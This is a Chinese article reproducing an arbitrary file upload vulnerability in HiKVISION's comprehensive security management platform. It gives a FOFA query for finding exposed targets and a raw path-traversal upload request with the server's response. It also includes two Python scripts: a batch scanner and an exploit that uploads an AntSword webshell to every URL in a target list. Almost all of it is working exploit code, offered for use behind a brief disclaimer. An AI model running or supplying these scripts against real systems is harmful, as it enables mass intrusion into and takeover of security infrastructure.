HiKVISION综合安防管理平台任意文件上传漏洞复现(附poc和exp)_安防器材_资讯

HiKVISION综合安防管理平台任意文件上传漏洞复现(附poc和exp)

2023-09-12 07:13 浏览:14

申明：本文仅供技术学习参考使用，请勿用作违法用途，否则后果自负。

一、漏洞名称

HiKVISION综合安防管理平台任意文件上传漏洞

二、漏洞影响

HiKVISION综合安防管理平台

三、漏洞描述

HiKVISION综合安防管理平台 /center/api/files;.js 接口存在任意文件上传漏洞，攻击者可以通过漏洞上传木马到服务器中，获得webshell。

四、资产FOFA搜索语句

app="HIKVISION-综合安防管理平台"

五、漏洞复现

向目标发送如下请求数据包，其中字符串ndbmaabfueriigbjadss12345是上传的jsp文件的内容

POST /center/api/files;.js HTTP/1.1Host: xx.xx.xx.xx:1443Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryxxmdzwoeUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
------WebKitFormBoundaryxxmdzwoeContent-Disposition: form-data; name="upload";filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/ukgmfyufsi.jsp"Content-Type:image/jpeg
<%out.println("pboyjnnrfipmplsukdeczudsefxmywex");%>------WebKitFormBoundaryxxmdzwoe--

收到响应数据包如下，其中path字段表示文件访问路径

HTTP/1.1 200 Cache-Control: no-cache, no-store, must-revalidatePragma: no-cacheContent-Type: application/json;charset=UTF-8Content-Length: 337Set-Cookie: JSESSIONID=73715E162ED9A0675D10A1644EEB3F12; Path=/center; HttpOnly;secureContent-Language: zh_CNExpires: 0Content-Disposition: inline;filename=f.txtDate: Mon, 11 Sep 2023 02:26:26 GMT
{"code":"0","data":{"filename":"../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/ukgmfyufsi.jsp","link":"http://192.168.240.1:8001/download1/center_faq/resource/5dab28a3-485a-4928-b358-0c73d3f2c40a/../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/ukgmfyufsi.jsp","id":"5dab28a3-485a-4928-b358-0c73d3f2c40a"},"msg":""}

然后请求如下路径查看上传的文件

https://xx.xx.xx.xx:1443/clusterMgr/ukgmfyufsi.jsp;.js

看到页面内容是我们写入的字符串

证明存在该漏洞

六、漏洞验证poc

该python脚本可以批量检测漏洞，C:\Users\DELL\Desktop\1004.txt为输入目标文件，每行是一个url

import argparseimport timeimport requests
def get_url(file):    with open('{}'.format(file),'r',encoding='utf-8') as f:        for i in f:            i = i.replace('\n', '')            send_req(i)
def write_result(content):    f = open("result.txt", "a", encoding="UTF-8")    f.write('{}\n'.format(content))    f.close()

def send_req(url_check):    print('{} runing Check'.format(url_check))    url = url_check + '/center/api/files;.js'    header = {        'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36',        'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryxxmdzwoe'    }    data = (        "------WebKitFormBoundaryxxmdzwoe\r\n"        'Content-Disposition: form-data; name="upload";filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/ukgmfyufsi1.jsp"\r\n'        'Content-Type:image/jpeg\r\n'        "\r\n"        '<%out.println("pboyjnnrfipmplsukdeczudsefxmywex");%>\r\n'        "------WebKitFormBoundaryxxmdzwoe--\r\n"    )        try:        requests.packages.urllib3.disable_warnings()        response = requests.post(url=url,headers=header,data=data,verify=False,timeout=3)                url2 = "{}/clusterMgr/ukgmfyufsi1.jsp;.js".format(url_check)        res2 = requests.get(url2, verify=False)        if response.status_code == 200 and res2.status_code == 200 and "pboyjnnrfipmplsukdeczudsefxmywex" in res2.text:            result = '{} 存在任意文件上传漏洞! 请访问目标自测：{} \n'.format(url_check,url2)            print(result)            write_result(result)        time.sleep(1)    except Exception as e:        pass
if __name__ == '__main__':    file = r"C:\Users\DELL\Desktop\1004.txt"    get_url(file)

七、漏洞利用exp

使用蚁剑生成木马，复制文本赋值给payload变量，运行脚本即可获得webshell

import argparseimport timeimport requests
def get_url(file):    with open('{}'.format(file),'r',encoding='utf-8') as f:        for i in f:            i = i.replace('\n', '')            send_req(i)
def write_result(content):    f = open("result.txt", "a", encoding="UTF-8")    f.write('{}\n'.format(content))    f.close()

def send_req(url_check):    print('{} runing Check'.format(url_check))    url = url_check + '/center/api/files;.js'    header = {        'User-Agent':'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36',        'Content-Type':'multipart/form-data; boundary=----WebKitFormBoundaryxxmdzwoe'    }    payload = ""# 木马文件内容    data = (        "------WebKitFormBoundaryxxmdzwoe\r\n"        'Content-Disposition: form-data; name="upload";filename="../../../../../bin/tomcat/apache-tomcat/webapps/clusterMgr/ukgmfyufsi1.jsp"\r\n'        'Content-Type:image/jpeg\r\n'        "\r\n"        '<%out.println("{}");%>\r\n'        "------WebKitFormBoundaryxxmdzwoe--\r\n"    ).format(payload)        try:        requests.packages.urllib3.disable_warnings()        response = requests.post(url=url,headers=header,data=data,verify=False,timeout=3)                url2 = "{}/clusterMgr/ukgmfyufsi1.jsp;.js".format(url_check)        res2 = requests.get(url2, verify=False)        if response.status_code == 200 and res2.status_code == 200 and "pboyjnnrfipmplsukdeczudsefxmywex" in res2.text:            result = '{} webshell上传成功! url：{}  密码：mypasswd\n'.format(url_check,url2)            print(result)            write_result(result)        time.sleep(1)    except Exception as e:        pass
if __name__ == '__main__':    file = r"C:\Users\DELL\Desktop\1004.txt"    get_url(file)

打赏